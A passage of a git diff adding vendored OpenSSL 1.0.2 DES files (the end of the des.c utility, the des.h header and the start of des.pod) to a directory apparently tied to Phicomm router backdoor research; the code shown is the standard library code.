+                in = argv[i];
+            else if (out == NULL)
+                out = argv[i];
+            else
+                error = 1;
+        }
+    }
+    if (error)
+        usage();
+    /*-
+     * We either
+     * do checksum or
+     * do encrypt or
+     * do decrypt or
+     * do decrypt then ckecksum or
+     * do checksum then encrypt
+     */
+    if (((eflag + dflag) == 1) || cflag) {
+        if (eflag)
+            do_encrypt = DES_ENCRYPT;
+        if (dflag)
+            do_encrypt = DES_DECRYPT;
+    } else {
+        if (vflag) {
+#ifndef _Windows
+            fprintf(stderr, "des(1) built with %s\n", libdes_version);
+#endif
+            EXIT(1);
+        } else
+            usage();
+    }
+
+#ifndef _Windows
+    if (vflag)
+        fprintf(stderr, "des(1) built with %s\n", libdes_version);
+#endif
+    if ((in != NULL) && (out != NULL) &&
+#ifndef OPENSSL_SYS_MSDOS
+        (stat(in, &ins) != -1) &&
+        (stat(out, &outs) != -1) &&
+        (ins.st_dev == outs.st_dev) && (ins.st_ino == outs.st_ino))
+#else                           /* OPENSSL_SYS_MSDOS */
+        (strcmp(in, out) == 0))
+#endif
+    {
+        fputs("input and output file are the same\n", stderr);
+        EXIT(3);
+    }
+
+    if (!kflag)
+        if (des_read_pw_string
+            (key, KEYSIZB + 1, "Enter key:", eflag ? VERIFY : 0)) {
+            fputs("password error\n", stderr);
+            EXIT(2);
+        }
+
+    if (in == NULL)
+        DES_IN = stdin;
+    else if ((DES_IN = fopen(in, "r")) == NULL) {
+        perror("opening input file");
+        EXIT(4);
+    }
+
+    CKSUM_OUT = stdout;
+    if (out == NULL) {
+        DES_OUT = stdout;
+        CKSUM_OUT = stderr;
+    } else if ((DES_OUT = fopen(out, "w")) == NULL) {
+        perror("opening output file");
+        EXIT(5);
+    }
+#ifdef OPENSSL_SYS_MSDOS
+    /* This should set the file to binary mode. */
+    {
+# include <fcntl.h>
+        if (!(uflag && dflag))
+            setmode(fileno(DES_IN), O_BINARY);
+        if (!(uflag && eflag))
+            setmode(fileno(DES_OUT), O_BINARY);
+    }
+#endif
+
+    doencryption();
+    fclose(DES_IN);
+    fclose(DES_OUT);
+    EXIT(0);
+}
+
+void usage(void)
+{
+    char **u;
+    static const char *Usage[] = {
+        "des <options> [input-file [output-file]]",
+        "options:",
+        "-v         : des(1) version number",
+        "-e         : encrypt using SunOS compatible user key to DES key conversion.",
+        "-E         : encrypt ",
+        "-d         : decrypt using SunOS compatible user key to DES key conversion.",
+        "-D         : decrypt ",
+        "-c[ckname] : generate a cbc_cksum using SunOS compatible user key to",
+        "             DES key conversion and output to ckname (stdout default,",
+        "             stderr if data being output on stdout).  The checksum is",
+        "             generated before encryption and after decryption if used",
+        "             in conjunction with -[eEdD].",
+        "-C[ckname] : generate a cbc_cksum as for -c but compatible with -[ED].",
+        "-k key     : use key 'key'",
+        "-h         : the key that is entered will be a hexadecimal number",
+        "             that is used directly as the des key",
+        "-u[uuname] : input file is uudecoded if -[dD] or output uuencoded data if -[eE]",
+        "             (uuname is the filename to put in the uuencode header).",
+        "-b         : encrypt using DES in ecb encryption mode, the default is cbc mode.",
+        "-3         : encrypt using triple DES encryption.  This uses 2 keys",
+        "             generated from the input key.  If the input key is less",
+        "             than 8 characters long, this is equivalent to normal",
+        "             encryption.  Default is triple cbc, -b makes it triple ecb.",
+        NULL
+    };
+    for (u = (char **)Usage; *u; u++) {
+        fputs(*u, stderr);
+        fputc('\n', stderr);
+    }
+
+    EXIT(1);
+}
+
+void doencryption(void)
+{
+#ifdef _LIBC
+    extern unsigned long time();
+#endif
+
+    register int i;
+    DES_key_schedule ks, ks2;
+    DES_cblock iv, iv2;
+    char *p;
+    int num = 0, j, k, l, rem, ll, len, last, ex = 0;
+    DES_cblock kk, k2;
+    FILE *O;
+    int Exit = 0;
+#ifndef OPENSSL_SYS_MSDOS
+    static unsigned char buf[BUFSIZE + 8], obuf[BUFSIZE + 8];
+#else
+    static unsigned char *buf = NULL, *obuf = NULL;
+
+    if (buf == NULL) {
+        if (((buf = OPENSSL_malloc(BUFSIZE + 8)) == NULL) ||
+            ((obuf = OPENSSL_malloc(BUFSIZE + 8)) == NULL)) {
+            fputs("Not enough memory\n", stderr);
+            Exit = 10;
+            goto problems;
+        }
+    }
+#endif
+
+    if (hflag) {
+        j = (flag3 ? 16 : 8);
+        p = key;
+        for (i = 0; i < j; i++) {
+            k = 0;
+            if ((*p <= '9') && (*p >= '0'))
+                k = (*p - '0') << 4;
+            else if ((*p <= 'f') && (*p >= 'a'))
+                k = (*p - 'a' + 10) << 4;
+            else if ((*p <= 'F') && (*p >= 'A'))
+                k = (*p - 'A' + 10) << 4;
+            else {
+                fputs("Bad hex key\n", stderr);
+                Exit = 9;
+                goto problems;
+            }
+            p++;
+            if ((*p <= '9') && (*p >= '0'))
+                k |= (*p - '0');
+            else if ((*p <= 'f') && (*p >= 'a'))
+                k |= (*p - 'a' + 10);
+            else if ((*p <= 'F') && (*p >= 'A'))
+                k |= (*p - 'A' + 10);
+            else {
+                fputs("Bad hex key\n", stderr);
+                Exit = 9;
+                goto problems;
+            }
+            p++;
+            if (i < 8)
+                kk[i] = k;
+            else
+                k2[i - 8] = k;
+        }
+        DES_set_key_unchecked(&k2, &ks2);
+        OPENSSL_cleanse(k2, sizeof(k2));
+    } else if (longk || flag3) {
+        if (flag3) {
+            DES_string_to_2keys(key, &kk, &k2);
+            DES_set_key_unchecked(&k2, &ks2);
+            OPENSSL_cleanse(k2, sizeof(k2));
+        } else
+            DES_string_to_key(key, &kk);
+    } else
+        for (i = 0; i < KEYSIZ; i++) {
+            l = 0;
+            k = key[i];
+            for (j = 0; j < 8; j++) {
+                if (k & 1)
+                    l++;
+                k >>= 1;
+            }
+            if (l & 1)
+                kk[i] = key[i] & 0x7f;
+            else
+                kk[i] = key[i] | 0x80;
+        }
+
+    DES_set_key_unchecked(&kk, &ks);
+    OPENSSL_cleanse(key, sizeof(key));
+    OPENSSL_cleanse(kk, sizeof(kk));
+    /* woops - A bug that does not showup under unix :-( */
+    memset(iv, 0, sizeof(iv));
+    memset(iv2, 0, sizeof(iv2));
+
+    l = 1;
+    rem = 0;
+    /* first read */
+    if (eflag || (!dflag && cflag)) {
+        for (;;) {
+            num = l = fread(&(buf[rem]), 1, BUFSIZE, DES_IN);
+            l += rem;
+            num += rem;
+            if (l < 0) {
+                perror("read error");
+                Exit = 6;
+                goto problems;
+            }
+
+            rem = l % 8;
+            len = l - rem;
+            if (feof(DES_IN)) {
+                for (i = 7 - rem; i > 0; i--)
+                    RAND_pseudo_bytes(buf + l++, 1);
+                buf[l++] = rem;
+                ex = 1;
+                len += rem;
+            } else
+                l -= rem;
+
+            if (cflag) {
+                DES_cbc_cksum(buf, &cksum, (long)len, &ks, &cksum);
+                if (!eflag) {
+                    if (feof(DES_IN))
+                        break;
+                    else
+                        continue;
+                }
+            }
+
+            if (bflag && !flag3)
+                for (i = 0; i < l; i += 8)
+                    DES_ecb_encrypt((DES_cblock *)&(buf[i]),
+                                    (DES_cblock *)&(obuf[i]),
+                                    &ks, do_encrypt);
+            else if (flag3 && bflag)
+                for (i = 0; i < l; i += 8)
+                    DES_ecb2_encrypt((DES_cblock *)&(buf[i]),
+                                     (DES_cblock *)&(obuf[i]),
+                                     &ks, &ks2, do_encrypt);
+            else if (flag3 && !bflag) {
+                char tmpbuf[8];
+
+                if (rem)
+                    memcpy(tmpbuf, &(buf[l]), (unsigned int)rem);
+                DES_3cbc_encrypt((DES_cblock *)buf, (DES_cblock *)obuf,
+                                 (long)l, ks, ks2, &iv, &iv2, do_encrypt);
+                if (rem)
+                    memcpy(&(buf[l]), tmpbuf, (unsigned int)rem);
+            } else {
+                DES_cbc_encrypt(buf, obuf, (long)l, &ks, &iv, do_encrypt);
+                if (l >= 8)
+                    memcpy(iv, &(obuf[l - 8]), 8);
+            }
+            if (rem)
+                memcpy(buf, &(buf[l]), (unsigned int)rem);
+
+            i = 0;
+            while (i < l) {
+                if (uflag)
+                    j = uufwrite(obuf, 1, (unsigned int)l - i, DES_OUT);
+                else
+                    j = fwrite(obuf, 1, (unsigned int)l - i, DES_OUT);
+                if (j == -1) {
+                    perror("Write error");
+                    Exit = 7;
+                    goto problems;
+                }
+                i += j;
+            }
+            if (feof(DES_IN)) {
+                if (uflag)
+                    uufwriteEnd(DES_OUT);
+                break;
+            }
+        }
+    } else {                    /* decrypt */
+
+        ex = 1;
+        for (;;) {
+            if (ex) {
+                if (uflag)
+                    l = uufread(buf, 1, BUFSIZE, DES_IN);
+                else
+                    l = fread(buf, 1, BUFSIZE, DES_IN);
+                ex = 0;
+                rem = l % 8;
+                l -= rem;
+            }
+            if (l < 0) {
+                perror("read error");
+                Exit = 6;
+                goto problems;
+            }
+
+            if (bflag && !flag3)
+                for (i = 0; i < l; i += 8)
+                    DES_ecb_encrypt((DES_cblock *)&(buf[i]),
+                                    (DES_cblock *)&(obuf[i]),
+                                    &ks, do_encrypt);
+            else if (flag3 && bflag)
+                for (i = 0; i < l; i += 8)
+                    DES_ecb2_encrypt((DES_cblock *)&(buf[i]),
+                                     (DES_cblock *)&(obuf[i]),
+                                     &ks, &ks2, do_encrypt);
+            else if (flag3 && !bflag) {
+                DES_3cbc_encrypt((DES_cblock *)buf, (DES_cblock *)obuf,
+                                 (long)l, ks, ks2, &iv, &iv2, do_encrypt);
+            } else {
+                DES_cbc_encrypt(buf, obuf, (long)l, &ks, &iv, do_encrypt);
+                if (l >= 8)
+                    memcpy(iv, &(buf[l - 8]), 8);
+            }
+
+            if (uflag)
+                ll = uufread(&(buf[rem]), 1, BUFSIZE, DES_IN);
+            else
+                ll = fread(&(buf[rem]), 1, BUFSIZE, DES_IN);
+            ll += rem;
+            rem = ll % 8;
+            ll -= rem;
+            if (feof(DES_IN) && (ll == 0)) {
+                last = obuf[l - 1];
+
+                if ((last > 7) || (last < 0)) {
+                    fputs("The file was not decrypted correctly.\n", stderr);
+                    Exit = 8;
+                    last = 0;
+                }
+                l = l - 8 + last;
+            }
+            i = 0;
+            if (cflag)
+                DES_cbc_cksum(obuf,
+                              (DES_cblock *)cksum, (long)l / 8 * 8, &ks,
+                              (DES_cblock *)cksum);
+            while (i != l) {
+                j = fwrite(obuf, 1, (unsigned int)l - i, DES_OUT);
+                if (j == -1) {
+                    perror("Write error");
+                    Exit = 7;
+                    goto problems;
+                }
+                i += j;
+            }
+            l = ll;
+            if ((l == 0) && feof(DES_IN))
+                break;
+        }
+    }
+    if (cflag) {
+        l = 0;
+        if (cksumname[0] != '\0') {
+            if ((O = fopen(cksumname, "w")) != NULL) {
+                CKSUM_OUT = O;
+                l = 1;
+            }
+        }
+        for (i = 0; i < 8; i++)
+            fprintf(CKSUM_OUT, "%02X", cksum[i]);
+        fprintf(CKSUM_OUT, "\n");
+        if (l)
+            fclose(CKSUM_OUT);
+    }
+ problems:
+    OPENSSL_cleanse(buf, sizeof(buf));
+    OPENSSL_cleanse(obuf, sizeof(obuf));
+    OPENSSL_cleanse(&ks, sizeof(ks));
+    OPENSSL_cleanse(&ks2, sizeof(ks2));
+    OPENSSL_cleanse(iv, sizeof(iv));
+    OPENSSL_cleanse(iv2, sizeof(iv2));
+    OPENSSL_cleanse(kk, sizeof(kk));
+    OPENSSL_cleanse(k2, sizeof(k2));
+    OPENSSL_cleanse(uubuf, sizeof(uubuf));
+    OPENSSL_cleanse(b, sizeof(b));
+    OPENSSL_cleanse(bb, sizeof(bb));
+    OPENSSL_cleanse(cksum, sizeof(cksum));
+    if (Exit)
+        EXIT(Exit);
+}
+
+/*    We ignore this parameter but it should be > ~50 I believe    */
+int uufwrite(unsigned char *data, int size, unsigned int num, FILE *fp)
+{
+    int i, j, left, rem, ret = num;
+    static int start = 1;
+
+    if (start) {
+        fprintf(fp, "begin 600 %s\n",
+                (uuname[0] == '\0') ? "text.d" : uuname);
+        start = 0;
+    }
+
+    if (uubufnum) {
+        if (uubufnum + num < 45) {
+            memcpy(&(uubuf[uubufnum]), data, (unsigned int)num);
+            uubufnum += num;
+            return (num);
+        } else {
+            i = 45 - uubufnum;
+            memcpy(&(uubuf[uubufnum]), data, (unsigned int)i);
+            j = uuencode((unsigned char *)uubuf, 45, b);
+            fwrite(b, 1, (unsigned int)j, fp);
+            uubufnum = 0;
+            data += i;
+            num -= i;
+        }
+    }
+
+    for (i = 0; i < (((int)num) - INUUBUFN); i += INUUBUFN) {
+        j = uuencode(&(data[i]), INUUBUFN, b);
+        fwrite(b, 1, (unsigned int)j, fp);
+    }
+    rem = (num - i) % 45;
+    left = (num - i - rem);
+    if (left) {
+        j = uuencode(&(data[i]), left, b);
+        fwrite(b, 1, (unsigned int)j, fp);
+        i += left;
+    }
+    if (i != num) {
+        memcpy(uubuf, &(data[i]), (unsigned int)rem);
+        uubufnum = rem;
+    }
+    return (ret);
+}
+
+void uufwriteEnd(FILE *fp)
+{
+    int j;
+    static const char *end = " \nend\n";
+
+    if (uubufnum != 0) {
+        uubuf[uubufnum] = '\0';
+        uubuf[uubufnum + 1] = '\0';
+        uubuf[uubufnum + 2] = '\0';
+        j = uuencode(uubuf, uubufnum, b);
+        fwrite(b, 1, (unsigned int)j, fp);
+    }
+    fwrite(end, 1, strlen(end), fp);
+}
+
+/*
+ * int size: should always be > ~ 60; I actually ignore this parameter :-)
+ */
+int uufread(unsigned char *out, int size, unsigned int num, FILE *fp)
+{
+    int i, j, tot;
+    static int done = 0;
+    static int valid = 0;
+    static int start = 1;
+
+    if (start) {
+        for (;;) {
+            b[0] = '\0';
+            fgets((char *)b, 300, fp);
+            if (b[0] == '\0') {
+                fprintf(stderr, "no 'begin' found in uuencoded input\n");
+                return (-1);
+            }
+            if (strncmp((char *)b, "begin ", 6) == 0)
+                break;
+        }
+        start = 0;
+    }
+    if (done)
+        return (0);
+    tot = 0;
+    if (valid) {
+        memcpy(out, bb, (unsigned int)valid);
+        tot = valid;
+        valid = 0;
+    }
+    for (;;) {
+        b[0] = '\0';
+        fgets((char *)b, 300, fp);
+        if (b[0] == '\0')
+            break;
+        i = strlen((char *)b);
+        if ((b[0] == 'e') && (b[1] == 'n') && (b[2] == 'd')) {
+            done = 1;
+            while (!feof(fp)) {
+                fgets((char *)b, 300, fp);
+            }
+            break;
+        }
+        i = uudecode(b, i, bb);
+        if (i < 0)
+            break;
+        if ((i + tot + 8) > num) {
+            /* num to copy to make it a multiple of 8 */
+            j = (num / 8 * 8) - tot - 8;
+            memcpy(&(out[tot]), bb, (unsigned int)j);
+            tot += j;
+            memcpy(bb, &(bb[j]), (unsigned int)i - j);
+            valid = i - j;
+            break;
+        }
+        memcpy(&(out[tot]), bb, (unsigned int)i);
+        tot += i;
+    }
+    return (tot);
+}
+
+#define ccc2l(c,l)      (l =((DES_LONG)(*((c)++)))<<16, \
+                         l|=((DES_LONG)(*((c)++)))<< 8, \
+                         l|=((DES_LONG)(*((c)++))))
+
+#define l2ccc(l,c)      (*((c)++)=(unsigned char)(((l)>>16)&0xff), \
+                    *((c)++)=(unsigned char)(((l)>> 8)&0xff), \
+                    *((c)++)=(unsigned char)(((l)    )&0xff))
+
+int uuencode(unsigned char *in, int num, unsigned char *out)
+{
+    int j, i, n, tot = 0;
+    DES_LONG l;
+    register unsigned char *p;
+    p = out;
+
+    for (j = 0; j < num; j += 45) {
+        if (j + 45 > num)
+            i = (num - j);
+        else
+            i = 45;
+        *(p++) = i + ' ';
+        for (n = 0; n < i; n += 3) {
+            ccc2l(in, l);
+            *(p++) = ((l >> 18) & 0x3f) + ' ';
+            *(p++) = ((l >> 12) & 0x3f) + ' ';
+            *(p++) = ((l >> 6) & 0x3f) + ' ';
+            *(p++) = ((l) & 0x3f) + ' ';
+            tot += 4;
+        }
+        *(p++) = '\n';
+        tot += 2;
+    }
+    *p = '\0';
+    l = 0;
+    return (tot);
+}
+
+int uudecode(unsigned char *in, int num, unsigned char *out)
+{
+    int j, i, k;
+    unsigned int n = 0, space = 0;
+    DES_LONG l;
+    DES_LONG w, x, y, z;
+    unsigned int blank = (unsigned int)'\n' - ' ';
+
+    for (j = 0; j < num;) {
+        n = *(in++) - ' ';
+        if (n == blank) {
+            n = 0;
+            in--;
+        }
+        if (n > 60) {
+            fprintf(stderr, "uuencoded line length too long\n");
+            return (-1);
+        }
+        j++;
+
+        for (i = 0; i < n; j += 4, i += 3) {
+            /*
+             * the following is for cases where spaces are removed from
+             * lines.
+             */
+            if (space) {
+                w = x = y = z = 0;
+            } else {
+                w = *(in++) - ' ';
+                x = *(in++) - ' ';
+                y = *(in++) - ' ';
+                z = *(in++) - ' ';
+            }
+            if ((w > 63) || (x > 63) || (y > 63) || (z > 63)) {
+                k = 0;
+                if (w == blank)
+                    k = 1;
+                if (x == blank)
+                    k = 2;
+                if (y == blank)
+                    k = 3;
+                if (z == blank)
+                    k = 4;
+                space = 1;
+                switch (k) {
+                case 1:
+                    w = 0;
+                    in--;
+                case 2:
+                    x = 0;
+                    in--;
+                case 3:
+                    y = 0;
+                    in--;
+                case 4:
+                    z = 0;
+                    in--;
+                    break;
+                case 0:
+                    space = 0;
+                    fprintf(stderr, "bad uuencoded data values\n");
+                    w = x = y = z = 0;
+                    return (-1);
+                    break;
+                }
+            }
+            l = (w << 18) | (x << 12) | (y << 6) | (z);
+            l2ccc(l, out);
+        }
+        if (*(in++) != '\n') {
+            fprintf(stderr, "missing nl in uuencoded line\n");
+            w = x = y = z = 0;
+            return (-1);
+        }
+        j++;
+    }
+    *out = '\0';
+    w = x = y = z = 0;
+    return (n);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.h
new file mode 100644
index 0000000..1b40144
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.h
@@ -0,0 +1,257 @@
+/* crypto/des/des.h */
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_NEW_DES_H
+# define HEADER_NEW_DES_H
+
+# include <openssl/e_os2.h>     /* OPENSSL_EXTERN, OPENSSL_NO_DES, DES_LONG
+                                 * (via openssl/opensslconf.h */
+
+# ifdef OPENSSL_NO_DES
+#  error DES is disabled.
+# endif
+
+# ifdef OPENSSL_BUILD_SHLIBCRYPTO
+#  undef OPENSSL_EXTERN
+#  define OPENSSL_EXTERN OPENSSL_EXPORT
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef unsigned char DES_cblock[8];
+typedef /* const */ unsigned char const_DES_cblock[8];
+/*
+ * With "const", gcc 2.8.1 on Solaris thinks that DES_cblock * and
+ * const_DES_cblock * are incompatible pointer types.
+ */
+
+typedef struct DES_ks {
+    union {
+        DES_cblock cblock;
+        /*
+         * make sure things are correct size on machines with 8 byte longs
+         */
+        DES_LONG deslong[2];
+    } ks[16];
+} DES_key_schedule;
+
+# ifndef OPENSSL_DISABLE_OLD_DES_SUPPORT
+#  ifndef OPENSSL_ENABLE_OLD_DES_SUPPORT
+#   define OPENSSL_ENABLE_OLD_DES_SUPPORT
+#  endif
+# endif
+
+# ifdef OPENSSL_ENABLE_OLD_DES_SUPPORT
+#  include <openssl/des_old.h>
+# endif
+
+# define DES_KEY_SZ      (sizeof(DES_cblock))
+# define DES_SCHEDULE_SZ (sizeof(DES_key_schedule))
+
+# define DES_ENCRYPT     1
+# define DES_DECRYPT     0
+
+# define DES_CBC_MODE    0
+# define DES_PCBC_MODE   1
+
+# define DES_ecb2_encrypt(i,o,k1,k2,e) \
+        DES_ecb3_encrypt((i),(o),(k1),(k2),(k1),(e))
+
+# define DES_ede2_cbc_encrypt(i,o,l,k1,k2,iv,e) \
+        DES_ede3_cbc_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(e))
+
+# define DES_ede2_cfb64_encrypt(i,o,l,k1,k2,iv,n,e) \
+        DES_ede3_cfb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n),(e))
+
+# define DES_ede2_ofb64_encrypt(i,o,l,k1,k2,iv,n) \
+        DES_ede3_ofb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n))
+
+OPENSSL_DECLARE_GLOBAL(int, DES_check_key); /* defaults to false */
+# define DES_check_key OPENSSL_GLOBAL_REF(DES_check_key)
+OPENSSL_DECLARE_GLOBAL(int, DES_rw_mode); /* defaults to DES_PCBC_MODE */
+# define DES_rw_mode OPENSSL_GLOBAL_REF(DES_rw_mode)
+
+const char *DES_options(void);
+void DES_ecb3_encrypt(const_DES_cblock *input, DES_cblock *output,
+                      DES_key_schedule *ks1, DES_key_schedule *ks2,
+                      DES_key_schedule *ks3, int enc);
+DES_LONG DES_cbc_cksum(const unsigned char *input, DES_cblock *output,
+                       long length, DES_key_schedule *schedule,
+                       const_DES_cblock *ivec);
+/* DES_cbc_encrypt does not update the IV!  Use DES_ncbc_encrypt instead. */
+void DES_cbc_encrypt(const unsigned char *input, unsigned char *output,
+                     long length, DES_key_schedule *schedule,
+                     DES_cblock *ivec, int enc);
+void DES_ncbc_encrypt(const unsigned char *input, unsigned char *output,
+                      long length, DES_key_schedule *schedule,
+                      DES_cblock *ivec, int enc);
+void DES_xcbc_encrypt(const unsigned char *input, unsigned char *output,
+                      long length, DES_key_schedule *schedule,
+                      DES_cblock *ivec, const_DES_cblock *inw,
+                      const_DES_cblock *outw, int enc);
+void DES_cfb_encrypt(const unsigned char *in, unsigned char *out, int numbits,
+                     long length, DES_key_schedule *schedule,
+                     DES_cblock *ivec, int enc);
+void DES_ecb_encrypt(const_DES_cblock *input, DES_cblock *output,
+                     DES_key_schedule *ks, int enc);
+
+/*
+ * This is the DES encryption function that gets called by just about every
+ * other DES routine in the library.  You should not use this function except
+ * to implement 'modes' of DES.  I say this because the functions that call
+ * this routine do the conversion from 'char *' to long, and this needs to be
+ * done to make sure 'non-aligned' memory access do not occur.  The
+ * characters are loaded 'little endian'. Data is a pointer to 2 unsigned
+ * long's and ks is the DES_key_schedule to use.  enc, is non zero specifies
+ * encryption, zero if decryption.
+ */
+void DES_encrypt1(DES_LONG *data, DES_key_schedule *ks, int enc);
+
+/*
+ * This functions is the same as DES_encrypt1() except that the DES initial
+ * permutation (IP) and final permutation (FP) have been left out.  As for
+ * DES_encrypt1(), you should not use this function. It is used by the
+ * routines in the library that implement triple DES. IP() DES_encrypt2()
+ * DES_encrypt2() DES_encrypt2() FP() is the same as DES_encrypt1()
+ * DES_encrypt1() DES_encrypt1() except faster :-).
+ */
+void DES_encrypt2(DES_LONG *data, DES_key_schedule *ks, int enc);
+
+void DES_encrypt3(DES_LONG *data, DES_key_schedule *ks1,
+                  DES_key_schedule *ks2, DES_key_schedule *ks3);
+void DES_decrypt3(DES_LONG *data, DES_key_schedule *ks1,
+                  DES_key_schedule *ks2, DES_key_schedule *ks3);
+void DES_ede3_cbc_encrypt(const unsigned char *input, unsigned char *output,
+                          long length,
+                          DES_key_schedule *ks1, DES_key_schedule *ks2,
+                          DES_key_schedule *ks3, DES_cblock *ivec, int enc);
+void DES_ede3_cbcm_encrypt(const unsigned char *in, unsigned char *out,
+                           long length,
+                           DES_key_schedule *ks1, DES_key_schedule *ks2,
+                           DES_key_schedule *ks3,
+                           DES_cblock *ivec1, DES_cblock *ivec2, int enc);
+void DES_ede3_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                            long length, DES_key_schedule *ks1,
+                            DES_key_schedule *ks2, DES_key_schedule *ks3,
+                            DES_cblock *ivec, int *num, int enc);
+void DES_ede3_cfb_encrypt(const unsigned char *in, unsigned char *out,
+                          int numbits, long length, DES_key_schedule *ks1,
+                          DES_key_schedule *ks2, DES_key_schedule *ks3,
+                          DES_cblock *ivec, int enc);
+void DES_ede3_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                            long length, DES_key_schedule *ks1,
+                            DES_key_schedule *ks2, DES_key_schedule *ks3,
+                            DES_cblock *ivec, int *num);
+# if 0
+void DES_xwhite_in2out(const_DES_cblock *DES_key, const_DES_cblock *in_white,
+                       DES_cblock *out_white);
+# endif
+
+int DES_enc_read(int fd, void *buf, int len, DES_key_schedule *sched,
+                 DES_cblock *iv);
+int DES_enc_write(int fd, const void *buf, int len, DES_key_schedule *sched,
+                  DES_cblock *iv);
+char *DES_fcrypt(const char *buf, const char *salt, char *ret);
+char *DES_crypt(const char *buf, const char *salt);
+void DES_ofb_encrypt(const unsigned char *in, unsigned char *out, int numbits,
+                     long length, DES_key_schedule *schedule,
+                     DES_cblock *ivec);
+void DES_pcbc_encrypt(const unsigned char *input, unsigned char *output,
+                      long length, DES_key_schedule *schedule,
+                      DES_cblock *ivec, int enc);
+DES_LONG DES_quad_cksum(const unsigned char *input, DES_cblock output[],
+                        long length, int out_count, DES_cblock *seed);
+int DES_random_key(DES_cblock *ret);
+void DES_set_odd_parity(DES_cblock *key);
+int DES_check_key_parity(const_DES_cblock *key);
+int DES_is_weak_key(const_DES_cblock *key);
+/*
+ * DES_set_key (= set_key = DES_key_sched = key_sched) calls
+ * DES_set_key_checked if global variable DES_check_key is set,
+ * DES_set_key_unchecked otherwise.
+ */
+int DES_set_key(const_DES_cblock *key, DES_key_schedule *schedule);
+int DES_key_sched(const_DES_cblock *key, DES_key_schedule *schedule);
+int DES_set_key_checked(const_DES_cblock *key, DES_key_schedule *schedule);
+void DES_set_key_unchecked(const_DES_cblock *key, DES_key_schedule *schedule);
+# ifdef OPENSSL_FIPS
+void private_DES_set_key_unchecked(const_DES_cblock *key,
+                                   DES_key_schedule *schedule);
+# endif
+void DES_string_to_key(const char *str, DES_cblock *key);
+void DES_string_to_2keys(const char *str, DES_cblock *key1, DES_cblock *key2);
+void DES_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                       long length, DES_key_schedule *schedule,
+                       DES_cblock *ivec, int *num, int enc);
+void DES_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                       long length, DES_key_schedule *schedule,
+                       DES_cblock *ivec, int *num);
+
+int DES_read_password(DES_cblock *key, const char *prompt, int verify);
+int DES_read_2passwords(DES_cblock *key1, DES_cblock *key2,
+                        const char *prompt, int verify);
+
+# define DES_fixup_key_parity DES_set_odd_parity
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.pod
new file mode 100644
index 0000000..bf479e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.pod
@@ -0,0 +1,217 @@
+=pod
+
+=head1 NAME
+
+des - encrypt or decrypt data using Data Encryption Standard
+
+=head1 SYNOPSIS
+
+B<des>
+(
+B<-e>
+|
+B<-E>
+) | (
+B<-d>
+|
+B<-D>
+) | (
+B<->[B<cC>][B<ckname>]
+) |
+[
+B<-b3hfs>
+] [
+B<-k>
+I<key>
+]
+] [
+B<-u>[I<uuname>]
+[
+I<input-file>
+[
